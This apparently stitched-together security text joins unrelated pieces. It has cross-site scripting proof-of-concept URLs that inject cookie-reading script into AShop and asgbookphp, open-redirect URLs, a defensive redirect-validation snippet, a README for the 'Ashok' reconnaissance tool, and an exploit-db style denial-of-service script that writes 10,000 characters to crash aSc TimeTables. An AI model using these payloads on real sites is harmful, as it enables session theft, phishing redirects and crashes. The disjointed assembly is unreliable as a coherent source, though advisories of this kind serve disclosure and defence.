http://www.example.com/ashop/?'"<script>alert(document.cookie)</script>
http://www.example.com/ashop/index.php?'"<script>alert(document.cookie)</script>
http://www.example.com/ashop/picture.php?picture=" stYle=x:expre/**/ssion(alert(document.cookie)) ns="
http://www.example.com/ashop/index.php?language='"<script>alert(document.cookie)</script>

FF 7.1

http://www.example.com/ashop/index.php?searchstring=1&showresult=true&exp='"</script><script>alert(666);</script>&resultpage=&categories=off&msg=&search=index.php&shop=1
http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage='"</script><script>alert(document.cookie)</script>&msg=
http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage=1&msg='"</script><script>alert(document.cookie)</script>
http://www.example.com/ashop/basket.php?cat=0&sid='"</script><script>alert(document.cookie)</script>&shop=1&payoption=3

Open Redirection

http://www.example.com/ashop/language.php?language=sv&redirect=http://www.google.com
http://www.example.com/ashop/currency.php?currency=aud&redirect=http://www.google.com
http://www.example.com/ashop/currency.php?redirect=http://www.google.com
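For the open-redirect URLs above, an added example (not AShop code) of the server-side check that makes a `redirect` parameter safe: only an absolute path on the same site is accepted, and anything carrying a scheme or host, a protocol-relative `//`, or a backslash variant that browsers normalise to `//` falls back to an assumed default page.

```python
from urllib.parse import urlsplit

DEFAULT_TARGET = "/ashop/index.php"   # assumed landing page to use when the parameter is rejected


def safe_redirect_target(redirect, default=DEFAULT_TARGET):
    """Return `redirect` only if it is a path on this site; otherwise return `default`.

    Rejected: anything with a scheme or host ("http://evil", "//evil", "https:evil",
    "javascript:..."), backslashes ("/\\evil" is treated as "//evil" by browsers),
    and relative strings, which are ambiguous once the app's path layout changes.
    """
    if not redirect:
        return default
    parts = urlsplit(redirect)            # also strips leading control characters and spaces
    if parts.scheme or parts.netloc:
        return default
    if "\\" in redirect:
        return default
    if not redirect.startswith("/") or redirect.startswith("//"):
        return default
    return redirect


if __name__ == "__main__":
    for value in ("http://www.google.com", "//www.google.com", "/\\www.google.com",
                  "https:www.google.com", "", "/ashop/catalogue.php?cat=3"):
        print(repr(value), "->", safe_redirect_target(value))
```

The stricter alternative, and the one to prefer when the set of legitimate destinations is small, is to accept only a key from a fixed table of allowed paths rather than any path at all; the function above is the minimum that closes the `redirect=http://...` form shown in the advisory.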
            

Reconnaissance is the first phase of a penetration test: gathering information before any real attack is planned. Ashok is a fast reconnaissance tool for penetration testers, built specifically for that reconnaissance phase. In Ashok v1.1 you will find an advanced Google dorker and a Wayback crawler.

Main features

- Wayback crawler machine
- Google dorking without limits
- GitHub information grabbing
- Subdomain identifier
- CMS/technology detector with custom headers

Installation

~ git clone https://github.com/ankitdobhal/Ashok

~ cd Ashok

~ python3.7 -m pip install -r requirements.txt

How to use Ashok?

A detailed usage guide is available in the Usage section of the wiki.

Some of the options are indexed below:

- Extract HTTP headers from a single URL
- Dump the Internet Archive (Wayback Machine) with JSON output for a single URL
- Google dorking, using the number of results as dorknumber
- DNS lookup of a single target domain
- Subdomain lookup of a single target domain
- Port scan of a single target domain using nmap
- Extract data using the GitHub username of the target
- Detect the CMS of the target URL

Docker

Ashok can be launched using a lightweight Python3.8-Alpine Docker image.

$ docker pull powerexploit/ashok-v1.2

$ docker container run -it powerexploit/ashok-v1.2 --help

Credits

HackerTarget

source: https://www.securityfocus.com/bid/50167/info

asgbookphp is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://code.google.com/p/asgbookphp/ asgbookphp 1.9 is vulnerable; other versions may also be affected. 

http://www.example.com/asgbookphp/index.php/>'><ScRiPt>alert(771818860)</ScRiPt> 
            
# Exploit Title: aSc TimeTables 2021.6.2 - Denial of Service (PoC)
# Date: 2020-01-12
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.asctimetables.com/#!/home
# Software Link: https://www.asctimetables.com/#!/home/download
# Version:  2021.6.2
# Tested on: Windows 10 Home x64

# STEPS
# Open the program aSc Timetables 2021
# In File select the option New
# Put any letter in the field "Name of the School" and click Next
# In the next window click NEXT
# In Step 3, under Subject click New
# Run the python exploit script; it will create a new .txt file
# Copy the content of the file "Metoo.txt"
# Paste the content in the field Subject title
# Click OK
# End :)

# 10,000 'Z' characters: pasting this into the Subject title field crashes the application.
buffer = 'Z' * 10000

try:
    with open("Metoo.txt", "w") as file:
        file.write(buffer)
    print("Archive ready")
except OSError as err:
    print("Archive not ready: %s" % err)